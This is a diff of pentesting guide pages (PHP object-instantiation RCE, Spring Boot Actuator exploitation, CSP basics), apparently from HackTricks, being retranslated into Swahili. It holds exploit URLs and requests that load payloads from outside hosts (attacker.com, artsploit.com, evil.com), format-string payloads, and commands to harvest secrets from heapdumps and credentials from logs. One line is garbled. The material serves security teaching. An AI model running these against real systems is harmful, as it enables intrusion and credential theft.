- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
- [Oracle MySQL Connector/J propertiesTransform RCE CVE-2023-21971 (Snyk)](https://security.snyk.io/vuln/SNYK-JAVA-COMMYSQL-5441540)
- [mysql-fake-server Rogue MySQL server for JDBC client attacks](https://github.com/4ra1n/mysql-fake-server)

60
src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md
View File

@ -1,16 +1,16 @@
# PHP - RCE kutumia uundaji wa object: new $_GET["a"]($_GET["b"])
# PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])
{{#include ../../../banners/hacktricks-training.md}}
Hii ni muhtasari wa [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
This is basically a summary of [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
## Utangulizi
Uundaji wa objects mpya za kiholela, kama `new $_GET["a"]($_GET["a"])`, unaweza kusababisha Remote Code Execution (RCE), kama ilivyoelezwa katika [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). Nyaraka hii inaangazia mikakati mbalimbali ya kupata RCE.
Uundaji wa vitu vipya chochote, kama `new $_GET["a"]($_GET["a"])`, unaweza kusababisha Remote Code Execution (RCE), kama ilivyoelezwa katika [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). Hati hii inaonyesha mbinu mbalimbali za kufikia RCE.
## RCE kupitia Madarasa Maalum au Autoloading
## RCE kupitia Custom Classes au Autoloading
Sintaksia `new $a($b)` inatumika kuunda object ambapo **`$a`** inawakilisha jina la class na **`$b`** ni hoja ya kwanza inayotumwa kwa constructor. Vigezo hivi vinaweza kupatikana kutoka kwa input za watumiaji kama GET/POST, ambapo vinaweza kuwa strings au arrays, au kutoka JSON, ambapo vinaweza kuonekana kama aina nyingine.
Muundo `new $a($b)` unatumika kuanzisha object ambapo **`$a`** inawakilisha jina la darasa na **`$b`** ni hoja ya kwanza inayopitishwa kwa constructor. Vigezo hivi vinaweza kupatikana kutoka kwa input za mtumiaji kama GET/POST, ambapo vinaweza kuwa strings au arrays, au kutoka JSON, ambapo vinaweza kuonyesha kama aina nyingine.
Consider the code snippet below:
```php
@ -31,9 +31,9 @@ $b = $_GET['b'];
new $a($b);
```
Katika mfano huu, kuweka `$a` kwa `App` au `App2` na `$b` kwa amri ya mfumo (kwa mfano, `uname -a`) husababisha utekelezaji wa amri hiyo.
Katika tukio hili, kuweka `$a` kuwa `App` au `App2` na `$b` kuwa amri ya mfumo (kwa mfano, `uname -a`) husababisha utekelezaji wa amri hiyo.
**Autoloading functions** zinaweza kutumiwa ikiwa madarasa hayo hayapatikani moja kwa moja. Hizi functions zinapakia madarasa kutoka kwa faili kiotomatiki wakati yanapohitajika na zimetangazwa kwa kutumia `spl_autoload_register` au `__autoload`:
**Autoloading functions** zinaweza kutumiwa ikiwa hakuna classes kama hizo zinazopatikana moja kwa moja. Kazi hizi zinapakia classes kutoka kwa faili wanapohitajika na zimetangazwa kwa kutumia `spl_autoload_register` au `__autoload`:
```php
spl_autoload_register(function ($class_name) {
include './../classes/' . $class_name . '.php';
@ -45,72 +45,72 @@ include $class_name . '.php';
spl_autoload_register();
```
Tabia ya autoloading inatofautiana kulingana na matoleo ya PHP, ikitoa fursa tofauti za RCE.
Tabia ya autoloading hubadilika kulingana na matoleo ya PHP, ikitoa fursa tofauti za RCE.
## RCE via Built-In Classes
## RCE kupitia madarasa yaliyojengwa ndani ya PHP
Iwapo hakuna custom classes au autoloaders, **madarasa ya ndani ya PHP** yanaweza kutosha kwa RCE. Idadi ya madarasa haya iko kati ya 100 hadi 200, kulingana na toleo la PHP na extensions. Yanaweza kuorodheshwa kwa kutumia `get_declared_classes()`.
Ikiwa hakuna madarasa maalum au autoloaders, **madarasa ya ndani ya PHP** yanaweza kutosha kwa RCE. Idadi ya madarasa haya ni kati ya 100 hadi 200, kulingana na toleo la PHP na extensions. Yanaweza kuorodheshwa kwa kutumia `get_declared_classes()`.
Constructors zinazovutia zinaweza kutambuliwa kupitia reflection API, kama inavyoonyeshwa katika mfano ufuatao na kiungo [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF).
Vianzaji vinavyovutia vinaweza kutambulika kupitia reflection API, kama inavyoonyeshwa katika mfano ufuatao na kiungo [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF).
**RCE via specific methods includes:**
**RCE kupitia mbinu maalum ni pamoja na:**
### **SSRF + Phar Deserialization**
Darasa `SplFileObject` unawezesha SSRF kupitia constructor yake, ukiruhusu miunganisho kwa URL yoyote:
Darasa la `SplFileObject` linawezesha SSRF kupitia constructor yake, likiruhusu muunganisho kwa URL yoyote:
```php
new SplFileObject('http://attacker.com/');
```
SSRF inaweza kusababisha mashambulizi ya deserialization katika matoleo ya PHP kabla ya 8.0 kwa kutumia itifaki ya Phar.
SSRF inaweza kusababisha deserialization attacks katika matoleo ya PHP kabla ya 8.0 kwa kutumia Phar protocol.
### **Kutumia PDOs**
### **Exploiting PDOs**
Konstrukta ya darasa la PDO inaruhusu muunganisho na hifadhidata kupitia DSN strings, na inaweza kuwezesha uundaji wa faili au mwingiliano mwingine:
Konstrukta ya darasa la PDO inaruhusu muunganisho na hifadhidata kupitia DSN strings, ambayo inaweza kuwezesha uundaji wa faili au mwingiliano mwingine:
```php
new PDO("sqlite:/tmp/test.txt")
```
### **SoapClient/SimpleXMLElement XXE**
Toleo za PHP hadi 5.3.22 na 5.4.12 zilikuwa nyeti kwa mashambulizi ya XXE kupitia vianzilishi `SoapClient` na `SimpleXMLElement`, kutegemea toleo la libxml2.
Toleo za PHP hadi 5.3.22 na 5.4.12 zilikuwa nyembamba kwa mashambulio ya XXE kupitia `SoapClient` na `SimpleXMLElement` constructors, kutegemea toleo la libxml2.
## RCE via Imagick Extension
Katika uchambuzi wa **tegemezi za mradi**, iligundulika kwamba **Imagick** inaweza kutumika kwa ajili ya **command execution** kwa kuunda objects mpya. Hii inatoa fursa ya exploiting vulnerabilities.
Katika uchambuzi wa **project's dependencies**, iligunduliwa kwamba **Imagick** inaweza kutumika kwa **command execution** kwa kuanzisha vitu vipya. Hii inatoa fursa ya kutumia udhaifu uliopo.
### VID parser
Uwezo wa VID parser wa kuandika maudhui katika njia yoyote iliyotajwa kwenye filesystem ulideteksiwa. Hii inaweza kusababisha kuwekwa kwa PHP shell katika directory inayoweza kupatikana kwa wavuti, ukifikia Remote Code Execution (RCE).
Uwezo wa VID parser wa kuandika yaliyomo kwa njia yoyote iliyotajwa kwenye filesystem uligunduliwa. Hii inaweza kusababisha kuwekwa kwa PHP shell katika saraka inayoweza kufikiwa na wavuti, ikifanikisha Remote Code Execution (RCE).
#### VID Parser + File Upload
Imetajwa kwamba PHP huhifadhi kwa muda files zilizopakiwa katika `/tmp/phpXXXXXX`. VID parser katika Imagick, kwa kutumia itifaki ya **msl**, inaweza kushughulikia wildcards katika paths za faili, ikirahisisha kunakiliwa kwa faili ya muda hadi mahali uliotengwa. Njia hii inatoa mbinu ya ziada ya kupata arbitrary file writing ndani ya filesystem.
Imetajwa kwamba PHP huhifadhi kwa muda uploaded files katika `/tmp/phpXXXXXX`. VID parser katika Imagick, ikitumia protocol ya **msl**, inaweza kushughulikia wildcards katika njia za faili, na hivyo kuwezesha kuhamisha faili la muda hadi mahali kilichochaguliwa. Njia hii inatoa mbinu nyingine ya kupata arbitrary file writing ndani ya filesystem.
### PHP Crash + Brute Force
Mbinu iliyoelezwa katika [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) inahusisha kupakia files ambazo husababisha server crash kabla ya kufutwa. Kwa brute-forcing jina la faili ya muda, inakuwa inawezekana kwa Imagick kutekeleza arbitrary PHP code. Hata hivyo, mbinu hii iligundulika kufanya kazi tu katika toleo la zamani la ImageMagick.
Njia iliyofafanuliwa katika [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) inahusisha kupakia faili zinazosababisha server kuanguka kabla ya kufutwa. Kwa brute-forcing jina la faili la muda, inakuwa inawezekana kwa Imagick kutekeleza arbitrary PHP code. Hata hivyo, mbinu hii ilionekana kuwa ya ufanisi tu katika toleo la zamani la ImageMagick.
## Format-string in class-name resolution (PHP 7.0.0 Bug #71105)
Wakati input ya mtumiaji inadhibiti jina la class (mfano, `new $_GET['model']()`), PHP 7.0.0 iliingiza bug ya muda wakati wa refactor ya `Throwable` ambapo engine ilikosea kutendea jina la class kama printf format string wakati wa resolution. Hii inaruhusu classic printf-style primitives ndani ya PHP: leaks with `%p`, write-count control with width specifiers, na arbitrary writes with `%n` dhidi ya in-process pointers (kwa mfano, GOT entries kwenye ELF builds).
Wakati user input inadhibiti jina la class (mfano, `new $_GET['model']()`), PHP 7.0.0 ilileta bug ya muda wakati wa refactor ya `Throwable` ambapo engine ilikosea kut扱 treat jina la class kama printf format string wakati wa utatuzi. Hii inaruhusu printf-style primitives ndani ya PHP: leaks na `%p`, write-count control kwa width specifiers, na arbitrary writes na `%n` dhidi ya in-process pointers (kwa mfano, GOT entries kwenye ELF builds).
Mfano mdogo la repro unaoonyesha udhaifu:
Mfano mdogo wa kuonyesha udhaifu:
```php
<?php
$model = $_GET['model'];
$object = new $model();
```
Muhtasari wa utekesaji (kutoka kwenye marejeo):
- Fichua anwani kwa kutumia `%p` katika jina la darasa ili kupata lengo linaloweza kuandikwa:
Exploitation outline (from the reference):
- Leak addresses via `%p` katika jina la darasa ili kupata lengo linaloweza kuandikwa:
```bash
curl "http://host/index.php?model=%p-%p-%p"
# Fatal error includes resolved string with leaked pointers
```
- Tumia vigezo vya nafasi na vipengele vya upana kuweka idadi kamili ya byte, kisha `%n` kuandika thamani hiyo kwa anwani inayofikika kwenye stack, ukilenga slot ya GOT (mfano, `free`) ili kuibadilisha sehemu kwa `system`.
- Chochea kazi iliyotekwa kwa kupitia jina la darasa lenye pipe ya shell ili kufikia `system("id")`.
- Tumia positional parameters na width specifiers kuweka idadi halisi ya byte, kisha `%n` kuandika thamani hiyo kwa anwani inayofikiwa kwenye stack, ukilenga slot ya GOT (mfano, `free`) ili kuifanyia partial overwrite kuelekea `system`.
- Sababisha function iliyotekwa kwa kupitisha jina la darasa linalojumuisha shell pipe ili kufikia `system("id")`.
Vidokezo:
- Inafanya kazi tu kwenye PHP 7.0.0 (Bug [#71105](https://bugs.php.net/bug.php?id=71105)); ilirekebishwa katika toleo zifuatazo. Ukali: muhimu sana ikiwa kuna uwezekano wa kutengeneza darasa kwa hiari.
- Payload za kawaida huunganisha `%p` nyingi kufuatilia stack, kisha `%.<width>d%<pos>$n` kufanya overwrite ya sehemu.
Notes:
- Inafanya kazi tu kwenye PHP 7.0.0 (Bug [#71105](https://bugs.php.net/bug.php?id=71105)); imerekebishwa katika matoleo yafuatayo. Ukali: ya juu ikiwa kuna uwezo wa kuanzisha darasa lolote kwa hiari.
- Typical payloads huunganisha `%p` nyingi kutembea stack, kisha `%.<width>d%<pos>$n` kupata partial overwrite.
## References

86
src/network-services-pentesting/pentesting-web/spring-actuators.md
View File

@ -6,30 +6,30 @@
<figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure>
**Kutoka** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
## Kutumia Spring Boot Actuators
## Exploiting Spring Boot Actuators
**Tazama chapisho la asili kutoka** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
**Angalia chapisho la awali kutoka** [**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
### **Mambo Muhimu:**
- Spring Boot Actuators hujisajili endpoints kama `/health`, `/trace`, `/beans`, `/env`, n.k. Katika matoleo 1 mpaka 1.4, endpoints hizi zinapatikana bila authentication. Kuanzia toleo 1.5 na baadaye, `/health` na `/info` zinaonekana kukosa usiri kwa default, lakini mara nyingi developers huzimia usalama huu.
- Endpoint fulani za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo hatarishi:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, na `/heapdump`.
- Katika Spring Boot 1.x, actuators hujisajili chini ya root URL, wakati kwenye 2.x, ziko chini ya base path ya `/actuator/`.
- Spring Boot Actuators register endpoints such as `/health`, `/trace`, `/beans`, `/env`, etc. Katika toleo 1 hadi 1.4, endpoints hizi zinaweza kupatikana bila uthibitisho. Kuanzia toleo 1.5 na baadaye, `/health` na `/info` pekee ndizo zisizo hatarishi kwa chaguo-msingi, lakini watengenezaji mara nyingi hufuta usalama huu.
- Endpoints fulani za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo hatarishi:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, and `/heapdump`.
- Katika Spring Boot 1.x, actuators zinajiandikisha chini ya root URL, wakati katika 2.x, ziko chini ya base path ya `/actuator/`.
### **Mbinu za Kuchukua Fursa:**
### **Exploitation Techniques:**
1. **Remote Code Execution via '/jolokia'**:
- Endpoint ya `/jolokia` actuator inaonyesha maktaba ya Jolokia, ambayo inaruhusu upatikanaji wa MBeans kupitia HTTP.
- Kitendo cha `reloadByURL` kinaweza kutumika kupakia upya usanidi wa logging kutoka URL ya nje, ambayo inaweza kusababisha blind XXE au Remote Code Execution kupitia usanidi wa XML uliotengenezwa.
- Mfano wa exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
- The `/jolokia` actuator endpoint exposes the Jolokia Library, ambayo inaruhusu upatikanaji wa MBeans kwa kupitia HTTP.
- The `reloadByURL` action inaweza kutumika kwa kureload configuration za logging kutoka kwenye URL ya nje, jambo ambalo linaweza kusababisha blind XXE au Remote Code Execution kupitia XML zilizotengenezwa mahsusi.
- Example exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Config Modification via '/env'**:
- Ikiwa Spring Cloud Libraries zipo, endpoint ya `/env` inaruhusu urekebishaji wa properties za mazingira.
- Properties zinaweza kudhibitiwa ili kuchukua fursa za udhaifu, kama vile udhaifu wa XStream deserialization katika Eureka serviceURL.
- Mfano wa POST request ya exploit:
- Ikiwa Spring Cloud Libraries zipo, endpoint ya `/env` inaruhusu mabadiliko ya properties za mazingira.
- Properties zinaweza kubadilishwa ili kutilia mtego udhaifu mbalimbali, kama vile udhaifu wa XStream deserialization katika Eureka serviceURL.
- Example exploit POST request:
```
POST /env HTTP/1.1
@ -40,32 +40,32 @@ Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
3. **Other Useful Settings**:
- Properties kama `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, na `spring.datasource.tomcat.max-active` zinaweza kudhibitiwa kwa ajili ya exploits mbalimbali, kama SQL injection au kubadilisha connection strings za database.
3. **Other Useful Settings:**
- Properties kama `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, na `spring.datasource.tomcat.max-active` zinaweza kubadilishwa kwa ajili ya exploits mbalimbali, kama SQL injection au kubadilisha connection strings za database.
### **Taarifa Zaidi:**
### **Taarifa za Ziada:**
- Orodha kamili ya default actuators inaweza kupatikana [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- Endpoint ya `/env` katika Spring Boot 2.x inatumia JSON format kwa ajili ya mabadiliko ya property, lakini kanuni ya jumla inabaki ile ile.
- Orodha kamili ya actuators chaguo-msingi inapatikana [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- The `/env` endpoint katika Spring Boot 2.x inatumia muundo wa JSON kwa mabadiliko ya property, lakini dhana kuu inabaki ile ile.
### **Mada Zinazohusiana:**
1. **Env + H2 RCE**:
- Maelezo juu ya kuchukua fursa ya mchanganyiko wa endpoint ya `/env` na database ya H2 yanapatikana [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
- Maelezo juu ya kutumia mchanganyiko wa endpoint ya `/env` na database ya H2 yanapatikana [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
2. **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
- Uendeshaji wa framework ya Spring wa matrix parameters (`;`) katika pathnames za HTTP unaweza kutumiwa kwa Server-Side Request Forgery (SSRF).
- Mfano wa ombi la exploit:
- Jinsi framework ya Spring inavyoshughulikia matrix parameters (`;`) katika pathnames za HTTP inaweza kutumika kwa Server-Side Request Forgery (SSRF).
- Example exploit request:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
## Kuchimba siri za HeapDump (credentials, tokens, internal URLs)
## HeapDump secrets mining (credentials, tokens, internal URLs)
Ikiwa `/actuator/heapdump` inapatikana, kawaida unaweza kupata snapshot kamili ya heap ya JVM ambayo mara nyingi ina siri hai (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, n.k.).
Ikiwa `/actuator/heapdump` imefunuliwa, kwa kawaida unaweza kupata snapshot kamili ya JVM heap ambayo mara nyingi ina siri zinazoishi (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, n.k.).
- Pakua na uchambuzi wa haraka:
- Download and quick triage:
```bash
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
@ -74,7 +74,7 @@ strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.dat
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
```
- Uchambuzi wa undani zaidi kwa kutumia VisualVM na OQL:
- Deeper analysis with VisualVM and OQL:
- Fungua heapdump katika VisualVM, chunguza instances za `java.lang.String` au endesha OQL kutafuta siri:
```
select s.toString()
@ -82,24 +82,24 @@ from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
```
- Uondoaji wa moja kwa moja kwa JDumpSpider:
- Automated extraction with JDumpSpider:
```bash
java -jar JDumpSpider-*.jar heapdump
```
Matokeo yenye thamani ya juu kwa kawaida:
- Spring `DataSourceProperties` / `HikariDataSource` objects exposing `url`, `username`, `password`.
- `OriginTrackedMapPropertySource` entries revealing `management.endpoints.web.exposure.include`, service ports, and embedded Basic-Auth in URLs (e.g., Eureka `defaultZone`).
- Plain HTTP request/response fragments including `Authorization: Basic ...` captured in memory.
Matokeo ya kawaida yenye thamani kubwa:
- Spring `DataSourceProperties` / `HikariDataSource` objects zinazoonyesha `url`, `username`, `password`.
- `OriginTrackedMapPropertySource` entries zinazoonyesha `management.endpoints.web.exposure.include`, ports za huduma, na Basic-Auth iliyojazwa ndani ya URLs (mfano, Eureka `defaultZone`).
- Vipande vya kawaida vya HTTP request/response vinavyojumuisha `Authorization: Basic ...` vilivyokamatwa ndani ya memory.
Vidokezo:
- Tumia wordlist inayolenga Spring ili kugundua actuator endpoints kwa haraka (mfano, SecLists spring-boot.txt) na kila mara angalia kama `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, na `/actuator/configprops` pia zinapatikana.
- Credentials kutoka heapdump mara nyingi hufanya kazi kwa huduma jirani na wakati mwingine kwa watumiaji wa mfumo (SSH), kwa hiyo jaribu kwa upana.
Tips:
- Tumia wordlist inayolenga Spring kugundua actuator endpoints haraka (mfano, SecLists spring-boot.txt) na hakikisha kila mara kama `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, na `/actuator/configprops` pia zimefunuliwa.
- Credentials kutoka heapdump mara nyingi hufanya kazi kwa huduma za jirani na wakati mwingine kwa watumiaji wa mfumo (SSH), hivyo vijaribu kwa upana.
## Kutumia vibaya Actuator loggers/logging ili capture credentials
## Kutumia vibaya Actuator loggers/logging kushika credentials
Ikiwa `management.endpoints.web.exposure.include` inaruhusu na `/actuator/loggers` inapatikana, unaweza kuinua kwa nguvu viwango vya log hadi DEBUG/TRACE kwa packages zinazoshughulikia authentication na request processing. Imeunganishwa na logs zinazoweza kusomwa (kupitia `/actuator/logfile` au njia za log zinazojulikana), hii inaweza leak credentials zilizowasilishwa wakati wa mchakato wa login (mfano, Basic-Auth headers au vigezo vya fomu).
Ikiwa `management.endpoints.web.exposure.include` inaruhusu na `/actuator/loggers` imefunuliwa, unaweza kwa nguvu kuongeza viwango vya logi kwa njia ya dynamic kuwa DEBUG/TRACE kwa packages zinazoshughulikia authentication na request processing. Ikichanganywa na logi zinazoweza kusomwa (kupitia `/actuator/logfile` au njia za logi zinazoeleweka), hii inaweza leak credentials zilizowasilishwa wakati wa login flows (mfano, Basic-Auth headers au form parameters).
- Orodhesha na ongeza viwango vya log vya nyeti:
- Enumerate and crank up sensitive loggers:
```bash
# List available loggers
curl -s http://target/actuator/loggers | jq .
@ -113,7 +113,7 @@ curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
```
- Tafuta mahali logs zinaandikwa na kusanya:
- Find where logs are written and harvest:
```bash
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
@ -122,13 +122,13 @@ curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|user
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
```
- Sababisha trafiki ya login/authentication na changanua log kwa creds. Katika mipangilio ya microservice yenye gateway mbele ya auth, kuwezesha TRACE kwa packages za gateway/security mara nyingi huonyesha headers na bodies za fomu. Baadhi ya mazingira hata hutengeneza trafiki ya login ya synthetic kwa vipindi, na kufanya ukusanyaji kuwa rahisi mara logging inapokuwa verbose.
- Trigger login/authentication traffic and parse the log for creds. Katika setups za microservice zenye gateway inayokinga auth, kuwezesha TRACE kwa packages za gateway/security mara nyingi hufanya headers na bodies za form kuwa zinazoonekana. Baadhi ya mazingira hata huunda synthetic login traffic kwa vipindi, hivyo kusanya kwa urahisi mara logging inapokuwa verbose.
Vidokezo:
- Rejesha viwango vya log ukimaliza: `POST /actuator/loggers/<logger>` na `{ "configuredLevel": null }`.
- Ikiwa `/actuator/httpexchanges` inapatikana, pia inaweza kuonyesha metadata ya maombi ya hivi karibuni ambayo inaweza kujumuisha sensitive headers.
Notes:
- Rudisha viwango vya logi ukimaliza: `POST /actuator/loggers/<logger>` ukiweka `{ "configuredLevel": null }`.
- Ikiwa `/actuator/httpexchanges` imefunuliwa, pia inaweza kuonyesha metadata ya maombi ya hivi karibuni ambayo inaweza kujumuisha headers zenye nyeti.
## Marejeleo
## References
- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations)
- [VisualVM](https://visualvm.github.io/)

328
src/pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -4,28 +4,28 @@
## CSP ni nini
Content Security Policy (CSP) inatambuliwa kama teknolojia ya kivinjari, iliyolenga kwa msingi wa **kuzuia mashambulizi kama cross-site scripting (XSS)**. Inafanya kazi kwa kufafanua na kueleza njia na vyanzo ambavyo rasilimali zinaweza kupakiwa kwa usalama na kivinjari. Rasilimali hizi zinajumuisha aina mbalimbali za vipengele kama picha, frames, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka kwa domaini ileile (self), ikiwa ni pamoja na rasilimali za inline na utekelezaji wa msimbo wa string kupitia functions kama `eval`, `setTimeout`, au `setInterval`.
Content Security Policy (CSP) inatambuliwa kama teknolojia ya kivinjari, iliyolengwa hasa **kuzuia mashambulizi kama cross-site scripting (XSS)**. Inafanya kazi kwa kuainisha na kubainisha njia na vyanzo ambavyo rasilimali zinaweza kupakiwa kwa usalama na kivinjari. Rasilimali hizi zinajumuisha vipengele mbalimbali kama picha, frames, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka domaini hiyo hiyo (self), ikiwa ni pamoja na rasilimali za inline na utekelezaji wa msimbo wa string kupitia funguo kama `eval`, `setTimeout`, au `setInterval`.
Utekelezaji wa CSP unafanywa kupitia **response headers** au kwa kuingiza **meta elements into the HTML page**. Kufuatia sera hii, vivinjari hutekeleza masharti haya kwa hiari na huzuia papo hapo uvunjaji wowote unaogundulika.
Utekelezaji wa CSP hufanywa kupitia **vichwa vya majibu** au kwa kuingiza **vipengele vya meta kwenye ukurasa wa HTML**. Kufuatia sera hii, vivinjari hutekeleza masharti haya kwa nguvu na huzuia mara moja ukiukaji wowote unaogundulika.
- Imewekwa kupitia response header:
- Imewekwa kupitia vichwa vya majibu:
```
Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
```
- Imefanywa kwa kutumia meta tag:
Imetekelezwa kupitia tagi ya meta:
```xml
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
```
### Vichwa
CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa vifuatavyo:
CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa hivi:
- `Content-Security-Policy`: Inatekeleza CSP; kivinjari kinazuia ukiukaji wowote.
- `Content-Security-Policy-Report-Only`: Imetumika kwa ufuatiliaji; inaripoti ukiukaji bila kuzuia. Inafaa kwa majaribio katika mazingira ya kabla ya uzalishaji.
- `Content-Security-Policy`: Inatekeleza CSP; browser inazuia ukiukaji wowote.
- `Content-Security-Policy-Report-Only`: Inatumika kwa ufuatiliaji; inaripoti ukiukaji bila kuzuia. Inafaa kwa upimaji katika mazingira ya kabla ya uzalishaji.
### Kufafanua Rasilimali
CSP inazuia asili za kupakia maudhui zote za active na passive, ikidhibiti vipengele kama utekelezaji wa inline JavaScript na matumizi ya `eval()`. Mfano wa sera ni:
CSP inapunguza vyanzo vya kupakia maudhui hai na pasivu, ikidhibiti vipengele kama utekelezaji wa JavaScript inline na matumizi ya `eval()`. Mfano wa sera ni:
```bash
default-src 'none';
img-src 'self';
@ -37,39 +37,39 @@ frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';
```
### Directives
### Maelekezo
- **script-src**: Inaruhusu vyanzo maalum vya JavaScript, ikiwa ni pamoja na URLs, scripts za inline, na scripts zinazochochewa na event handlers au XSLT stylesheets.
- **script-src**: Inaruhusu vyanzo maalum vya JavaScript, ikijumuisha URLs, scripts za inline, na scripts zinazosababishwa na event handlers au XSLT stylesheets.
- **default-src**: Inaweka sera ya msingi ya kupata rasilimali wakati maelekezo maalum ya fetch hayapo.
- **child-src**: Inaeleza vyanzo vinavyoruhusiwa kwa web workers na maudhui yaliyowekwa ndani ya frames.
- **connect-src**: Inazuia URLs zinazoweza kupakuliwa kupitia interfaces kama fetch, WebSocket, XMLHttpRequest.
- **frame-src**: Inaweka vikwazo kwa URLs zinazotumiwa na frames.
- **frame-ancestors**: Inaeleza vyanzo vinavyoweza kuingiza ukurasa wa sasa, inafaa kwa elementi kama `<frame>`, `<iframe>`, `<object>`, `<embed>`, na `<applet>`.
- **img-src**: Inaelekeza vyanzo vinavyoruhusiwa kwa picha.
- **font-src**: Inaeleza vyanzo vyenye uhalali kwa fonts zinazopakuliwa kutumia `@font-face`.
- **manifest-src**: Inaelekeza vyanzo vinavyoruhusiwa vya application manifest files.
- **media-src**: Inaelekeza vyanzo vinavyoruhusiwa kwa kupakia vitu vya media.
- **object-src**: Inaelekeza vyanzo vinavyoruhusiwa kwa elementi `<object>`, `<embed>`, na `<applet>`.
- **base-uri**: Inaeleza URLs zinazoruhusiwa kupakiwa kwa kutumia elementi `<base>`.
- **form-action**: Inaorodhesha endpoints halali kwa uwasilishaji wa fomu.
- **plugin-types**: Inazuia mime types ambazo ukurasa unaweza kuitisha.
- **child-src**: Inabainisha vyanzo vinavyoruhusiwa kwa web workers na yaliyomo ndani ya embedded frames.
- **connect-src**: Inaweka kikomo kwa URLs zinazoweza kupakiwa kwa kutumia interfaces kama fetch, WebSocket, XMLHttpRequest.
- **frame-src**: Inaweka kikomo kwa URLs kwa frames.
- **frame-ancestors**: Inabainisha vyanzo vinavyoweza kuingiza ukurasa wa sasa, inafaa kwa elementi kama `<frame>`, `<iframe>`, `<object>`, `<embed>`, na `<applet>`.
- **img-src**: Inafafanua vyanzo vinavyoruhusiwa kwa picha.
- **font-src**: Inabainisha vyanzo halali kwa fonts zinazopakiwa kwa kutumia `@font-face`.
- **manifest-src**: Inafafanua vyanzo vinavyoruhusiwa vya application manifest files.
- **media-src**: Inafafanua vyanzo vinavyoruhusiwa kwa kupakia vitu vya media.
- **object-src**: Inafafanua vyanzo vinavyoruhusiwa kwa elementi `<object>`, `<embed>`, na `<applet>`.
- **base-uri**: Inabainisha URLs zinazoruhusiwa kwa matumizi ya elementi `<base>`.
- **form-action**: Inaorodhesha endpoints halali za kuwasilisha forms.
- **plugin-types**: Inakataza mime types ambazo ukurasa unaweza kuwaita.
- **upgrade-insecure-requests**: Inaelekeza browsers kuandika upya URLs za HTTP kuwa HTTPS.
